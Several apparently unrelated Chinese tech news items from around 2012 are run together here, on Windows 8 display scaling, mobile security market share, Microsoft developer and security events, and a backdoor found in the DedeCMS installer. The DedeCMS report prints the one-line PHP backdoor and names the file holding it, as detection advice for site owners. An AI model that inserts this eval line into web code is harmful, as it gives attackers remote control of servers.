据国外媒体报道,因此前苹果发布新款Ipad配备的显示屏上让人称奇,其他平板电脑厂商也将计入高清屏的行列当中所以,微软将针对Retina等像素密度高的屏幕,制定了Windows 8界面显示的计划。
在标准分辨率下,按键和文本将正常显示,不会缩放。在高清分辨率下,它们将是正常大小的140%,而在quad-XGA分辨率下,它们将是正常大小的180%。对Windows 8团队而言,放大50%或者100%并不方便,具体原因目前尚不清楚。
另一种解决方案则是不断调整显示内容的大小。如使用该方案,不管屏幕尺寸和分辨率的大小,所有的按键和字体的大小都将一致。不过该架构还没落实,原因是文本的存储和显示方式、网页内容的尺寸和限制等诸多问题正妨碍该更为高级的解决方案的实施。目前它还在研发当中。
据微软UX(用户体验)团队成员大卫•华盛顿(David Washington)表示,像素密度高的屏幕使得下拉菜单、小关闭框等很多熟悉的用户界面元素“越来越令人讨厌”。全新的操作和视觉元素将会替代它们,如Metro。
近日,国际知名的调研公司赛诺(SINO Marker Research Ltd)发布了2011年第四季度《中国手机安全市场现状与趋势》调研,其中,显示2011年第四度,中国手机安全产品激活用户数首次破亿,达到1.005亿,网秦以6311.4万的安全产品注册用户数占据62.8%的市场份额,比上季度增加1.3%,排名第一全面领先市场。奇虎360则以24.2%排在第二位, 腾讯市场份额10.7%排名第三。这也是网秦连续四季度排名市场第一。
图片:赛诺2011Q4手机安全产品市场调研中网秦市场份额排名第一
据悉,赛诺(SINO Marker Research Ltd)是中国移动通信行业最大的市场研究机构之一。拥有近百名行业分析师,监测网络覆盖全国31个省190地市和526县的零售监测网络。近年来,赛诺也会每年每季度推出针对移动互联网市场、特别是移动安全行业的权威调研分析,通过现状解析、份额调研和趋势预判,为行业发展提供权威数据参照。
3G化趋势明显,安全隐患频生
调研报告指出,2011年第4季度,智能机销量持续增长,市场份额达到32.2%,其中3G手机的销量达到6610万台,但在智能手机极其应用在快速增长、移动互联网的蓬勃发展的背后,却隐藏着极大的安全隐患。据网秦“云安全”监测平台统计:在2011年截获的24794款手机恶意软件中,“远程控制木马”以27.3%的感染比例位居首位,同比2010年初涨幅高达89%,全年累计感染手机291万部,成为2011年度智能手机的第一安全威胁。而恶意扣费、隐私窃取、资费消耗类、系统破坏类则以25.5%、16.3%、11.2%、8.4%的比例位居其后,其后则为流氓软件(5.3%)、诱骗欺诈(4.1%)、恶意传播类(1.9%)恶意软件。
网秦市场份额排名第1 ,继续领跑市场
面对病毒木马的猖獗,吸费软件的变身,用户安全和隐私保护也显得更为重要。调研报告指出,当前,中国手机安全市场的占有率正呈现高度集中的现象,截至2011年第四季度底,中国手机安全产品激活用户数达到1.005亿,从注册用户数的市场份额来看,网秦排名第一,注册用户数达6311.4万,占据62.8%的市场份额;360排名第二,注册用户数达2432.1万,占据24.2%的市场份额;腾讯排名第三,注册用户数达1075.35万,占据10.7%的市场份额。
对此,调研认为,尽管我国手机安全的激活用户已高达1.005亿,但相对于市场需求,其数量远不及手机安全的实际市场容量,仍然存在较大成长空间;因此,手机安全目前处于市场导入期中后期阶段;预计未来几年手机安全产业将迎来迅速发展阶段。
调研最后指出,面对日益凸显的手机安全形势,以网秦为代表的专业手机安全服务商在用户发展上存在较大的优势,加之与运营商和终端厂商的产品深层战略合作,和不断延伸的业务链条,将持续引领手机安全产业的发展。
日前,织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。为此,360于当天紧急推出DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。
图1:DedeCms被植入的后门代码
据悉,DedeCMS正广泛应用于众多企业网站、政府网站、高校网站及个人网站上,是国内用户量最大的PHP类CMS系统。360安全工程师分析发现,此次DedeCMS曝出的后门名为“一句话后门”,其恶意代码存在于DedeCMS购物车类文件中,凡是调用该购物车类的文件均会触发后门,从而导致整个网站甚至服务器遭黑客进一步控制。
360建议,使用DedeCMS的网站站长应立刻检测include/shoper.class.php文件中是否存在后门代码“@eval(file_get_contents('php://input'));”,如存在应删除该行代码,如不存在则证明没有该“一句话后门”。
作为开源软件,DedeCMS此次曝出后门并非个例。因为在国际上,Linux等多款著名的开源软件也曾遭黑客植入后门。不过,乌云漏洞平台公开的织梦官方邮件显示,织梦开发团队否认了产品曾被植入后门,但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。
图2:测试验证PHP代码可被DedeCMS后门执行
微软的官方开发应用博客是Windows 8应用程序开发者经常去的地方,在那可以获得更多开发上的帮助。这周,博客讨论了关于如何让开发者使用异步代码创建“快速流畅的Metro风格的应用程序”的话题。
微软的Jason奥尔森博客上说“你有多少次使用的是Windows应用程序停止响应,应用程序变成灰色的并没有响应?它似乎总是选择在最不该来的时间来,更糟糕的是,当这一切发生的时候,你可能会失去了很多艰苦的工作。”
奥尔森说,为什么一个应用程序会出现这样的问题,原因是应用程序采用同步代码编写的,这就意味着应用程序只有等待其他进程完成之后才能处理。这类最典型的例子就是你在上网的时候突然来了一个电话,他通常是先断开网络之后才能接通电话。
最后奥尔森表示希望有更多的客户喜欢Windows8应用程序,加入到开发当中来。希望通过使用异步代码的方式更轻松地开发应用程序。并能能够轻松地应用到社交网站,云中存储数据等,带来一个伟大的用户体验。
3月22日,在有着200 多位政府官员、学者、安全专家和软件开发人员齐聚一堂的盛会上,微软可信赖计算部门总经理 John Lambert 鼓励中国软件公司采用业界领先的开发工具和实践来提高产品安全性,增强在全球市场的竞争力。
2012信息安全论坛现场
2012 信息安全论坛和科技展由中国计算机学会计算机安全专业委员会和微软公司联合主办,大会内容包括主题演讲、圆桌讨论和安全增强技术的现场演示。
微软大中华区首席法律顾问Tim Cranton
微软可信赖计算部总经理 John Lambert
Lambert 在主题演讲中重点谈到了中国的具体安全趋势,强调软件开发人员迫切需要利用能够实现深度防御的安全缓解技术。根据 Net Applications 的数据,现在中国有几乎24% 的互联网用户正在使用 IE 6,占全球 IE 6 用户的半数以上。 此外,这些计算机中的大多数在运行 Windows XP 或更早的平台。 Lambert 强调,这个统计数据令人担忧,因为根据 Microsoft 安全报告第 11 卷 的报告,Windows XP Service Pack 3 感染恶意软件的可能性比 Windows 7 高六倍。
为帮助 IT 专业人员和软件开发人员利用安全科技资源和最佳实践领域的最新创新成果,微软演示了在此次活动中展示的四个安全开发工具:
增强的缓解体验工具包(EMET) – 帮助用户缓解像零日威胁这类没有安全更新的威胁;
攻击面分析器(Attack Surface Analyzer) – 这一工具可在安装产品前后获取系统状态的快照,显示对 Windows 攻击面若干关键因素的更改;
威胁建模工具(Threat Modeling Tool) – 帮助工程师分析系统威胁,在软件生命周期的早期发现并解决设计问题;
BinScope 工具 – 验证是否正确使用了安全缓解技术,如 ASLR 或 DEP。
这些工具免费向公众提供,微软定期在其安全开发生命周期 (SDL) 的各个不同阶段使用它们。SDL 是一种安全的软件开发方法,可编写能最大程度减小软件和服务中漏洞的数量、严重性和可攻击性的代码。在此次活动中,包括淘宝、奇虎 360 和翰海源在内的中国本地公司分享了利用这些工具的部分成功经验。
Lambert 重点介绍微软SDL对其产品和服务的影响,分享了最近的一项研究。该研究显示,对比过去 18 个月内所有微软软件的最新版本与所有受支持的上一版本,微软产品中的漏洞可攻击性总体下降了 30% 以上。
在中国,随着安全界使用免费安全缓解技术和工具的意识日益增强,提高软件安全质量也将势在必行。 这样可以培育更安全的全球计算生态系统,帮助保护世界上最大软件市场上的 Windows 和 Internet Explorer用户。
微软可信赖计算部门旗下的安全工程中心 (MSEC) 在Lambert的领导下从事安全科技工作。 安全科技的用途是识别新出现的安全漏洞和威胁类别,针对这些新类别进行主动防御开发。 微软使用安全科技开发先进的工具和技术,使攻击软件难于成功。
“本地安全公司、软件公司和搜索服务提供商都在竞争中国市场,在这些公司中,很多在运行各种版本的 Windows 操作系统、IE和其它基于 Trident 的浏览器。”Lambert 说, “我们对这个市场的安全科技进行了分析,分析结果是,这些供应商中很多仍然没有利用 Windows 内置的安全缓解技术,如地址空间随机化(ASLR)和数据执行保护(DEP)。”
Lambert 在演讲的最后,向用户和 IT 专业人员提供了具体的指导,帮助他们获得保护,防范攻击。 他鼓励用户使用新产品,让他们的系统及时安装最新的安全更新,使用来源可靠的反恶意软件。 微软还鼓励 IT 专业人员思考一下,他们正在使用或考虑使用的软件是否执行了类似 SDL 的安全流程来尽量减少软件漏洞,以及是否采用了攻击缓解技术。